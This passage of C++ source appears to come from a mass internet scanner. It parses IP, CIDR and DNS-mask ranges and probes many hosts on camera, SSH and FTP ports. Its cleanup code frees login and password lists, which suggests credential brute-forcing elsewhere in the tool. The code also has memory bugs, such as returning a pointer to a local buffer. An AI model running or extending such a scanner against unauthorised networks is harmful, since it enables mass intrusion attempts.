++i) { mOctet[3] = mOctet[3] << 1; mOctet[3] |= 1; }; mOctet[3] = mOctet[3] << 8 - (mask - 24); } else if (mask >= 16) { mOctet[0] = 255; mOctet[1] = 255; for (int i = 0; i < mask - 16 - 1; ++i) { mOctet[2] = mOctet[2] << 1; mOctet[2] |= 1; }; mOctet[2] = mOctet[2] << 8 - (mask - 16); mOctet[3] = 0; } else if (mask >= 8) { mOctet[0] = 255; for (int i = 0; i < mask - 8 - 1; ++i) { mOctet[1] = mOctet[1] << 1; mOctet[1] |= 1; }; mOctet[1] = mOctet[1] << 8 - (mask - 8); mOctet[2] = 0; mOctet[3] = 0; } else { for (int i = 0; i < mask - 1; ++i) { mOctet[0] = mOctet[0] << 1; mOctet[0] |= 1; }; mOctet[0] = mOctet[0] << 8 - mask; mOctet[1] = 0; mOctet[2] = 0; mOctet[3] = 0; }; unsigned char ocRes = 0; for (int i = 0; i < 4; ++i) { ocRes = octet[i] & mOctet[i]; starterIP[flCounter][i] = ocRes; ipsstartfl[flCounter][i] = ocRes; if (mOctet[i] == 255) ipsendfl[flCounter][i] = octet[i]; else ipsendfl[flCounter][i] = octet[i] | ~mOctet[i]; }; gTargets += pow((float)2, (32 - mask)); ++flCounter; } else if (strstr(curIP, "RESTORE_IMPORT_SESSION") != NULL) { ///DUMMY/// } else { char tempMsg[256] = { 0 }; strcpy(tempMsg, "[IP Loader]Wrong list format. Line-> ["); strcat(tempMsg, std::to_string(flCounter).c_str()); strcat(tempMsg, "] String-> ["); strcat(tempMsg, curIPCopy); strcat(tempMsg, "]"); stt->doEmitionRedFoundData(QString(tempMsg)); return; }; ZeroMemory(curIP, sizeof(curIP)); }; }; gTargets -= 1; gTargetsOverall = gTargets; targets = gTargets; stt->doEmitionYellowFoundData("List loader - [OK] (" + QString::number(gTargetsOverall + 1) + " hosts)"); fclose(fl); } else { stt->doEmitionRedFoundData("[IP Loader] Cannot open IP list."); }; } char *GetCIDRRangeStr(char *str) { char result[128] = { 0 }; char start[32] = { 0 }; char end[32] = { 0 }; int mask = 0; char *ptr1 = strstr(str, "/"); GetOctets(str); mask = atoi(ptr1 + 1); unsigned char mOctet[4]; mOctet[0] = 1; mOctet[1] = 1; mOctet[2] = 1; mOctet[3] = 1; if (mask >= 24) { mOctet[0] = 255; mOctet[1] = 255; mOctet[2] = 255; for (int i = 0; i < mask - 24 - 1; ++i) { mOctet[3] = mOctet[3] << 1; mOctet[3] |= 1; }; mOctet[3] = mOctet[3] << 8 - (mask - 24); } else if (mask >= 16) { mOctet[0] = 255; mOctet[1] = 255; for (int i = 0; i < mask - 16 - 1; ++i) { mOctet[2] = mOctet[2] << 1; mOctet[2] |= 1; }; mOctet[2] = mOctet[2] << 8 - (mask - 16); mOctet[3] = 0; } else if (mask >= 8) { mOctet[0] = 255; for (int i = 0; i < mask - 8 - 1; ++i) { mOctet[1] = mOctet[1] << 1; mOctet[1] |= 1; }; mOctet[1] = mOctet[1] << 8 - (mask - 8); mOctet[2] = 0; mOctet[3] = 0; } else { for (int i = 0; i < mask - 1; ++i) { mOctet[0] = mOctet[0] << 1; mOctet[0] |= 1; }; mOctet[0] = mOctet[0] << 8 - mask; mOctet[1] = 0; mOctet[2] = 0; mOctet[3] = 0; }; sprintf(start, "%d.%d.%d.%d", octet[0] & mOctet[0], octet[1] & mOctet[1], octet[2] & mOctet[2], octet[3] & mOctet[3]); unsigned char tempRes0 = 0; unsigned char tempRes1 = 0; unsigned char tempRes2 = 0; unsigned char tempRes3 = 0; if (mOctet[0] == 255) tempRes0 = octet[0]; else tempRes0 = octet[0] | ~mOctet[0]; if (mOctet[1] == 255) tempRes1 = octet[1]; else tempRes1 = octet[1] | ~mOctet[1]; if (mOctet[2] == 255) tempRes2 = octet[2]; else tempRes2 = octet[2] | ~mOctet[2]; if (mOctet[3] == 255) tempRes3 = octet[3]; else tempRes3 = octet[3] | ~mOctet[3]; sprintf(end, "%d.%d.%d.%d", tempRes0, tempRes1, tempRes2, tempRes3); sprintf(result, "%s-%s", start, end); return result; } int fInit(int InitMode, char *gR) { strcpy(metaRange, gR); if (InitMode == 0) { if (strstr(gR, "/") != NULL) { ++flCounter; char *str1; char *str2; char res[8] = { 0 }; GetOctets(gR); if (strstr(gR, ".") != NULL) { str1 = strstr(gR, "."); //1 byte strncpy(res, gR, (int)((char*)str1 - gR)); } else strcpy(res, gR); if (strstr(res, "/") != NULL) { CheckMaskBits(res, flCounter); } else { starterIP[flCounter][0] = atoi(res); ipsstartfl[flCounter][0] = atoi(res); ipsendfl[flCounter][0] = atoi(res); }; ZeroMemory(res, sizeof(res)); if (strstr(str1 + 1, ".") != NULL) { str2 = strstr(str1 + 1, "."); //2 byte strncpy(res, str1 + 1, (int)((char*)str2 - str1) - 1); } else strcpy(res, str1 + 1); if (strstr(res, "/") != NULL) { CheckMaskBits(res, flCounter); } else { starterIP[flCounter][1] = atoi(res); ipsstartfl[flCounter][1] = atoi(res); ipsendfl[flCounter][1] = atoi(res); }; ZeroMemory(res, sizeof(res)); if (strstr(str2 + 1, ".") != NULL) { str1 = strstr(str2 + 1, "."); //3 byte strncpy(res, str2 + 1, (int)((char*)str1 - str2) - 1); } else strcpy(res, str2 + 1); if (strstr(res, "/") != NULL) { CheckMaskBits(res, flCounter); } else { starterIP[flCounter][2] = atoi(res); ipsstartfl[flCounter][2] = atoi(res); ipsendfl[flCounter][2] = atoi(res); }; ZeroMemory(res, sizeof(res)); if (strstr(str1 + 1, ".") != NULL) { str2 = strstr(str1 + 1, "."); //4 byte strncpy(res, str1 + 1, (int)((char*)str2 - str1) - 1); } else strcpy(res, str1 + 1); if (strstr(res, "/") != NULL) { CheckMaskBits(res, flCounter); } else { starterIP[flCounter][3] = atoi(res); ipsstartfl[flCounter][3] = atoi(res); ipsendfl[flCounter][3] = atoi(res); }; ipsstart[0] = ipsstartfl[flCounter][0]; ipsstart[1] = ipsstartfl[flCounter][1]; ipsstart[2] = ipsstartfl[flCounter][2]; ipsstart[3] = ipsstartfl[flCounter][3]; ipsend[0] = ipsendfl[flCounter][0]; ipsend[1] = ipsendfl[flCounter][1]; ipsend[2] = ipsendfl[flCounter][2]; ipsend[3] = ipsendfl[flCounter][3]; } else { int x; char des1[64] = { 0 }; for (int i = 0; i < 3; i++) //Filling the range-starting ip mass. { x = strcspn(gR, "."); memcpy(des1, gR, x*sizeof(int)); memset(gR, ' ', x + 1); ipsstart[i] = atoi(des1); ZeroMemory(des1, sizeof(des1)); if (ipsstart[i] > 255) { stt->doEmitionRedFoundData("[Error] Incorrect range."); stt->doEmitionKillSttThread(); return -1; }; }; x = strcspn(gR, "-"); if (strstr(gR, "-") == NULL) { stt->doEmitionRedFoundData("[Error] Incorrect range."); stt->doEmitionKillSttThread(); return -1; }; memcpy(des1, gR, x); ipsstart[3] = atoi(des1); memset(gR, ' ', x + 1); if (strstr(gR, ".") == NULL) { stt->doEmitionRedFoundData("[Error] Incorrect range."); stt->doEmitionKillSttThread(); return -1; }; for (int i = 0; i < 4; i++) //Filling the range-closing ip mass. { x = strcspn(gR, "."); memcpy(des1, gR, x); memset(gR, ' ', x + 1); ipsend[i] = atoi(des1); if (ipsend[i] > 255) { stt->doEmitionRedFoundData("[Error] Incorrect range."); stt->doEmitionKillSttThread(); return -1; }; }; }; if ((ipsstart[0] > ipsend[0]) || ( (ipsstart[0] >= ipsend[0]) && (ipsstart[1] > ipsend[1]) ) || ( (ipsstart[0] >= ipsend[0]) && (ipsstart[1] >= ipsend[1]) && (ipsstart[2] > ipsend[2]) ) || ( (ipsstart[0] >= ipsend[0]) && (ipsstart[1] >= ipsend[1]) && (ipsstart[2] >= ipsend[2]) && (ipsstart[3] > ipsend[3]) ) ) { stt->doEmitionRedFoundData("[Error] Incorrect range."); stt->doEmitionKillSttThread(); return -1; }; targets = numOfIps(ipsstart, ipsend); }; } int ParseArgs(int argc, char *argv[]) { int s = 0; int indexPorts = 0; if (strstr(argv[1], "-f") != NULL) { FileLoader(argv[2]); } if (gMode == 0) { if (strstr(argv[2], "-") != NULL) { strcpy(gRange, argv[2]); } else if (strstr(argv[2], "/") != NULL) { strcpy(gRange, GetCIDRRangeStr(argv[2])); } else { strcpy(gRange, argv[2]); strcat(gRange, "-"); strcat(gRange, argv[2]); }; strcpy(saveEndIP, gRange); strcpy(finalIP, strstr(gRange, "-") + 1); } else if (gMode == 1) { if (strstr(argv[2], "/") != NULL) { strcpy(gRange, argv[2]); strcpy(saveEndIP, argv[2]); } else { strcpy(gRange, argv[2]); strcpy(saveEndIP, gRange); }; }; for (int i = 1; i <= argc - 1; i++) { s += strlen(argv[i]) + 2; }; char *argString = new char[s + 1]; ZeroMemory(argString, sizeof(*argString)); for (int i = 1; i <= argc - 1; i++) { strcat(argString, argv[i]); if (i != argc - 1) strcat(argString, "::"); }; if (strstr(argString, "-p") != NULL) { char *portString = strstr(argString, "-p"); char p[4096] = { 0 }; if (strstr(portString, "::") != NULL) { strncpy(gPorts, portString, (int)(strstr(portString, "::") - portString)); strncpy(p, strstr(argString, "-p") + 2, (int)(strstr(portString, "::") - portString)); } else { strcpy(gPorts, portString); strcpy(p, strstr(argString, "-p") + 2); }; char *lex; if (strstr(p, ",") != NULL) { lex = strtok(p, ","); portArr[indexPorts++] = atoi(lex); while ((lex = strtok(NULL, ",")) != NULL) { portArr[indexPorts++] = atoi(lex); overallPorts++; }; } else if (strstr(p, "-") != NULL) { char *startp; char *endp; char buffForPorts[16] = { 0 }; lex = strtok(p, "-p"); startp = lex; lex = strtok(NULL, "-"); endp = lex; for (int i = atoi(startp); i <= atoi(endp); i++) { portArr[indexPorts++] = i; overallPorts++; }; ZeroMemory(buffForPorts, sizeof(buffForPorts)); } else { lex = strtok(p, "-p"); portArr[indexPorts++] = atoi(lex); }; } else { portArr[0] = 80; portArr[1] = 81; portArr[2] = 88; portArr[3] = 8080; portArr[4] = 8081; portArr[5] = 60001; portArr[6] = 60002; portArr[7] = 8008; portArr[8] = 8888; portArr[9] = 554; portArr[10] = 9000; portArr[11] = 441; portArr[12] = 4111; portArr[13] = 6667; portArr[14] = 3536; portArr[15] = 22; portArr[16] = 21; overallPorts = 16; strcpy(gPorts, "--DEFAULT"); }; ZeroMemory(argString, sizeof(*argString)); delete[] argString; return 0; } char charAll[38] = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '_', '-', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' }; int _getPos(char l) { for (int i = 0; i < 38; ++i) { if (l == charAll[i]) return i; }; return -1; } int _getChunkCount(char *data) { int firstPos = _getPos(data[1]); int secondPos = _getPos(data[2]); return secondPos - firstPos + 1; } void _connect() { std::string ip = ""; std::unique_lock lk; while (globalScanFlag) { lk = std::unique_lock(Threader::m); Threader::cv.wait(lk, []{return Threader::ready; }); if (!globalScanFlag || Threader::threadId > gThreads) { --Threader::threadId; lk.unlock(); Threader::ready = true; Threader::cv.notify_all(); return; } Threader::ready = false; if (!Threader::ipQueue.empty()) { ip = Threader::ipQueue.front(); Threader::ipQueue.pop(); lk.unlock(); ++ipCounter; ++cons; for (int i = 0; i <= overallPorts; ++i) { if (!globalScanFlag) break; if (Connector::_ConnectToPort((char*)ip.c_str(), portArr[i]) == -2) break; }; --cons; stt->doEmitionUpdateArc(gThreads); } else lk.unlock(); } } int _GetDNSFromMask(char *mask, char *saveMask, char *saveMaskEnder) { if (strstr(mask, "[") != NULL) { char maskEnd[1024] = { 0 }; char maskRes[1024] = { 0 }; char *ptr1 = strstr(mask, "["); char *ptr2 = strstr(ptr1, "]"); int sz = ptr2 - ptr1; char chunk[8] = { 0 }; strncpy(chunk, ptr1, sz + 1); int firstPos = _getPos(chunk[1]); int secondPos = _getPos(chunk[2]); if (firstPos > secondPos) { stt->doEmitionRedFoundData("Error at mask (Wrong letter sequence)"); return -1; }; char maskStart[1024] = { 0 }; int startPosition = strstr(mask, "[") - mask; strncpy(maskStart, mask, startPosition); char maskEntry[1024] = { 0 }; if (saveMaskEnder != NULL) { int startSavePosition = strstr(saveMaskEnder, "[") - saveMaskEnder; strncpy(maskEntry, saveMaskEnder, startSavePosition); }; int szMask = strlen(mask); int szOffset = startPosition + 2; if (szMask != szOffset) strcpy(maskEnd, strstr(mask, "]") + 1); else ZeroMemory(maskEnd, sizeof(maskEnd));; char maskSaver[128] = { 0 }; if (firstPos != -1 && secondPos != -1) { for (int i = firstPos; i <= secondPos; ++i) { if (!globalScanFlag) break; strcpy(maskSaver, saveMask); strcat(maskSaver, maskEntry); chunk[1] = charAll[i]; strcat(maskSaver, chunk); strcpy(maskRes, maskStart); maskRes[startPosition] = charAll[i]; strcat(maskRes, maskEnd); if (_GetDNSFromMask(maskRes, maskSaver, maskEnd) == -1) return -1; ZeroMemory(maskSaver, sizeof(maskSaver)); ZeroMemory(maskRes, sizeof(maskRes)); }; }; } else { strcpy(currentMask, saveMask); while (cons >= gThreads && globalScanFlag) Sleep(300); if (!globalScanFlag) return 0; ++indexIP; sprintf(currentIP, "%s%s", mask, gTLD); verboseProgress(gTargets); Threader::fireThread(currentIP, (void*(*)(void))_connect); }; } void runAuxiliaryThreads() { FileUpdater::loadOnce(); if (!FileUpdater::running) { std::thread lpThread(FileUpdater::updateLists); lpThread.detach(); } std::thread trackerThread(_tracker); trackerThread.detach(); std::thread timerThread(_timer); timerThread.detach(); std::thread saverThread(_saver); saverThread.detach(); } int startScan(char* args) { curl_global_init(CURL_GLOBAL_ALL); horLineFlag = false; flCounter = 0; PieAnomC1 = 0, PieWF = 0, PieBA = 0, PieSusp = 0, PieLowl = 0, PieSSH = 0; AnomC1 = 0, baCount = 0, Filt = 0, Overl = 0, Lowl = 0, Alive = 0, Activity = 0, saved = 0, Susp = 0, WF = 0, offlines = 0; BrutingThrds = 0; found = 0; gTargets = 0; targets = 0; cons = 0; overallPorts = 0; found = 0; indexIP = 0; ZeroMemory(octet, sizeof(octet)); ZeroMemory(ipsstart, sizeof(ipsstart)); ZeroMemory(ipsend, sizeof(ipsend)); #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) CreateDirectoryA(RESULT_DIR_NAME, NULL); #else struct stat str = {0}; if (stat(RESULT_DIR_NAME, &str) == -1) { mkdir(RESULT_DIR_NAME, 0700); } #endif int argc = 0; char *argv[512] = { 0 }; char *tStr = strtok(args, "|"); while (tStr != NULL) { argv[argc++] = tStr; tStr = strtok(NULL, "|"); }; ParseArgs(argc, argv); int resInit = fInit(gMode, gRange); if (resInit == -1) { stt->doEmitionRedFoundData("[Error] fInit failure"); stt->doEmitionKillSttThread(); return -1; }; runAuxiliaryThreads(); if (gMode == 0) { unsigned long ip1 = (ipsstart[0] * 16777216) + (ipsstart[1] * 65536) + (ipsstart[2] * 256) + ipsstart[3]; unsigned long ip2 = (ipsend[0] * 16777216) + (ipsend[1] * 65536) + (ipsend[2] * 256) + ipsend[3]; switch (gShuffle) { case true: { std::vector ipVec; struct in_addr tAddr; for (unsigned long i = ip1; i <= ip2; ++i) { if (!globalScanFlag) break; unsigned long offset = ip2 - i; tAddr.s_addr = ntohl(i); ipVec.push_back(inet_ntoa(tAddr)); if (ipVec.size() >= (offset < 1000 ? offset : 1000)) { std::random_shuffle(ipVec.begin(), ipVec.end()); while (ipVec.size() != 0) { while (cons >= gThreads && globalScanFlag) Sleep(500); if (!globalScanFlag) goto haters_gonna_hate_IPM; ++indexIP; strcpy(currentIP, ipVec[0].c_str()); ipVec.erase(ipVec.begin()); verboseProgress(gTargets); Threader::fireThread(currentIP, (void*(*)(void))_connect); } } } haters_gonna_hate_IPM:; break; } case false: { struct in_addr tAddr; for (unsigned long i = ip1; i <= ip2; ++i) { while (cons >= gThreads && globalScanFlag) Sleep(500); if (!globalScanFlag) break; ++indexIP; tAddr.s_addr = ntohl(i); strcpy(currentIP, inet_ntoa(tAddr)); verboseProgress(gTargets); Threader::fireThread(currentIP, (void*(*)(void))_connect); } break; } } } else if (gMode == 1) { char dataEntry[1024] = { 0 }; int innerCounter = 0; int sz = strlen(saveEndIP); for (int i = 0; i < sz; ++i) { if (saveEndIP[i] == '\\') { if (saveEndIP[i + 1] == 'd') { strcat(dataEntry, "[09]"); ++i; innerCounter += 4; continue; } else if (saveEndIP[i + 1] == 'w') { strcat(dataEntry, "[0z]"); ++i; innerCounter += 4; continue; } else if (saveEndIP[i + 1] == 'l') { strcat(dataEntry, "[az]"); ++i; innerCounter += 4; continue; } else { QString errStr = "Error at mask (Position:" + QString::number(i + 1); errStr += ") \""; errStr += QString(saveEndIP).mid(0, i == 0 ? 0 : i); errStr += ""; errStr += QString(saveEndIP).mid(i, i == 0 ? i + 2 : i + 1); errStr += ""; errStr += QString(saveEndIP).mid(i + 2, strlen(saveEndIP)); errStr += "\""; stt->doEmitionRedFoundData(errStr); return -1; }; } else { memset(dataEntry + innerCounter++, saveEndIP[i], 1); }; }; memset(dataEntry + innerCounter + 1, '\0', 1); strcpy(currentMask, dataEntry); for (int i = 0; i < sz; ++i) { if (dataEntry[i] == '[') { for (int j = i + 1; j < i + 3; ++j) { if ((dataEntry[j] < '0' || dataEntry[j] > '9') && (dataEntry[j] < 'a' || dataEntry[j] > 'z') && dataEntry[j] != '_' && dataEntry[j] != '-' ) { QString errStr = "Error at mask (" + QString::number(j - 1); errStr += ") \""; errStr += QString(dataEntry).mid(0, j - 1); errStr += ""; errStr += QString(dataEntry).mid(j - 1, j + 1); errStr += ""; errStr += QString(dataEntry).mid(j + 1, strlen(dataEntry)); errStr += "\""; stt->doEmitionRedFoundData(errStr); return -1; }; }; i += 3; } else if (dataEntry[i] == ']') { QString errStr = "Error at mask (" + QString::number(i - 1); errStr += ") \""; errStr += QString(dataEntry).mid(0, i - 1); errStr += ""; errStr += QString(dataEntry).mid(i - 1, i + 1); errStr += ""; errStr += QString(dataEntry).mid(i + 1, strlen(dataEntry)); errStr += "\""; stt->doEmitionRedFoundData(errStr); return -1; }; }; unsigned long long dnsCounter = 1; char *dnsPtr1 = strstr(dataEntry, "["); while (dnsPtr1 != NULL) { dnsCounter *= _getChunkCount(dnsPtr1); dnsPtr1 = strstr(dnsPtr1 + 1, "["); }; gTargets = dnsCounter; gTargetsOverall = gTargets; stt->doEmitionYellowFoundData("Starting DNS-scan..."); stt->doEmitionChangeStatus("Scanning..."); int y = _GetDNSFromMask(dataEntry, "", dataEntry); if (y == -1) { stt->doEmitionRedFoundData("DNS-Mode error"); }; } else if (gMode == -1) { if (flCounter == 0) { stt->doEmitionRedFoundData("Empty IP list."); globalScanFlag = false; stt->doEmitionKillSttThread(); return -1; }; stt->doEmitionChangeStatus("Scanning..."); for (gC = 0; gC < flCounter; ++gC) { strcpy(metaRange, std::to_string(ipsstartfl[gC][0]).c_str()); strcat(metaRange, "."); strcat(metaRange, std::to_string(ipsstartfl[gC][1]).c_str()); strcat(metaRange, "."); strcat(metaRange, std::to_string(ipsstartfl[gC][2]).c_str()); strcat(metaRange, "."); strcat(metaRange, std::to_string(ipsstartfl[gC][3]).c_str()); strcat(metaRange, "-"); strcat(metaRange, std::to_string(ipsendfl[gC][0]).c_str()); strcat(metaRange, "."); strcat(metaRange, std::to_string(ipsendfl[gC][1]).c_str()); strcat(metaRange, "."); strcat(metaRange, std::to_string(ipsendfl[gC][2]).c_str()); strcat(metaRange, "."); strcat(metaRange, std::to_string(ipsendfl[gC][3]).c_str()); unsigned long ip1 = (ipsstartfl[gC][0] * 16777216) + (ipsstartfl[gC][1] * 65536) + (ipsstartfl[gC][2] * 256) + ipsstartfl[gC][3]; unsigned long ip2 = (ipsendfl[gC][0] * 16777216) + (ipsendfl[gC][1] * 65536) + (ipsendfl[gC][2] * 256) + ipsendfl[gC][3]; switch (gShuffle) { case true: { std::vector ipVec; struct in_addr tAddr; for (unsigned long i = ip1; i <= ip2; ++i) { if (!globalScanFlag) break; unsigned long offset = ip2 - i; tAddr.s_addr = ntohl(i); ipVec.push_back(inet_ntoa(tAddr)); if (ipVec.size() >= (offset < 1000 ? offset : 1000)) { std::random_shuffle(ipVec.begin(), ipVec.end()); while (ipVec.size() != 0) { while (cons >= gThreads && globalScanFlag) Sleep(500); if (!globalScanFlag) goto haters_gonna_hate_IM; ++indexIP; strcpy(currentIP, ipVec[0].c_str()); ipVec.erase(ipVec.begin()); verboseProgress(gTargets); Threader::fireThread(currentIP, (void*(*)(void))_connect); } } } haters_gonna_hate_IM:; break; } case false: { struct in_addr tAddr; for (unsigned long i = ip1; i <= ip2; ++i) { while (cons >= gThreads && globalScanFlag) Sleep(500); if (!globalScanFlag) break; ++indexIP; tAddr.s_addr = ntohl(i); strcpy(currentIP, inet_ntoa(tAddr)); verboseProgress(gTargets); Threader::fireThread(currentIP, (void*(*)(void))_connect); } break; }; } } } else { stt->doEmitionRedFoundData("Wrong parameters."); }; Sleep(gTimeOut + 1); stt->doEmitionYellowFoundData("Stopping threads..."); stt->doEmitionChangeStatus("Stopping..."); while (cons > 0 || jsonArr->size() > 0) { Sleep(2000); }; stt->doEmitionGreenFoundData("Done. Saved: " + QString::number(saved) + "; Alive: " + QString::number(found) + "."); stt->doEmitionChangeStatus("Idle"); while (__savingBackUpFile) Sleep(100); nCleanup(); stt->doEmitionKillSttThread(); //stt->terminate(); } void nCleanup(){ FileUpdater::FUClear(); Threader::cleanUp(); curl_global_cleanup(); if (loginLst != NULL) { for (int i = 0; i < MaxLogin; ++i) delete[]loginLst[i]; delete[]loginLst; loginLst = NULL; }; if (passLst != NULL) { for (int i = 0; i < MaxPass; ++i) delete[]passLst[i]; delete[]passLst; passLst = NULL; }; if (GlobalNegatives != NULL) { for (int i = 0; i < GlobalNegativeSize; ++i) delete[]GlobalNegatives[i]; delete[]GlobalNegatives; GlobalNegatives = NULL; }; if (wfPassLst != NULL) { for (int i = 0; i < MaxWFPass; ++i) delete[]wfPassLst[i]; delete[]wfPassLst; wfPassLst = NULL; }; if (wfLoginLst != NULL) { for (int i = 0; i < MaxWFLogin; ++i) delete[]wfLoginLst[i]; delete[]wfLoginLst; wfLoginLst = NULL; }; if (sshlpLst != NULL) { for (int i = 0; i < MaxSSHPass; ++i) delete[]sshlpLst[i]; delete[]sshlpLst; sshlpLst = NULL; }; if (ipsstartfl != NULL) { for (int i = 0; i < flCounter; ++i) delete[]ipsstartfl[i]; delete[]ipsstartfl; ipsstartfl = NULL; }; if (ipsendfl != NULL) { for (int i = 0; i < flCounter; ++i) delete[]ipsendfl[i]; delete[]ipsendfl; ipsendfl = NULL; }; if (starterIP != NULL) { for (int i = 0; i < flCounter; ++i) delete[]starterIP[i]; delete[]starterIP; starterIP = NULL; }; }